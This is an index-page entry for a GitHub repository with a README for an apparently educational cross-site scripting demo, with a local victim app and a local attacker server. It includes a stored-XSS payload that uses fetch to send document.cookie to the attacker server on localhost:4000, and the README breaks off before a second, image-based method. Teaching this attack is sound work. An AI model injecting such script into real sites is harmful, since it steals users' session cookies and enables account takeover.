Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/lcostea/wsm-sec-xss-attack-app
https://github.com/lcostea/wsm-sec-xss-attack-app
Last synced: about 2 months ago
JSON representation
- Host: GitHub
- URL: https://github.com/lcostea/wsm-sec-xss-attack-app
- Owner: lcostea
- License: mit
- Created: 2024-05-10T13:50:21.000Z (8 months ago)
- Default Branch: main
- Last Pushed: 2024-09-18T09:16:04.000Z (3 months ago)
- Last Synced: 2024-09-19T12:11:46.253Z (3 months ago)
- Language: HTML
- Size: 308 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 7
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
## XSS Demo attack web app
To run this project, follow these steps:
1. Install the dependencies by running the following command:
```shell
npm install
```2. Launch the web application with the following command:
```shell
node server.js
```3. Point your browser to [http://localhost:3000](http://localhost:3000) to access the victim web app.
Then you can enter javascript and it will be saved and run on the page: `Hello from my bold comment`
4. Launch the attacker with the following command:
```shell
node attacker-server.js
```5. Open in browser [http://localhost:4000](http://localhost:4000/) - the attacker web app
6. Add these to the victim website:
- the script way: fetch('http://localhost:4000?data=${document.cookie}')
- the image way: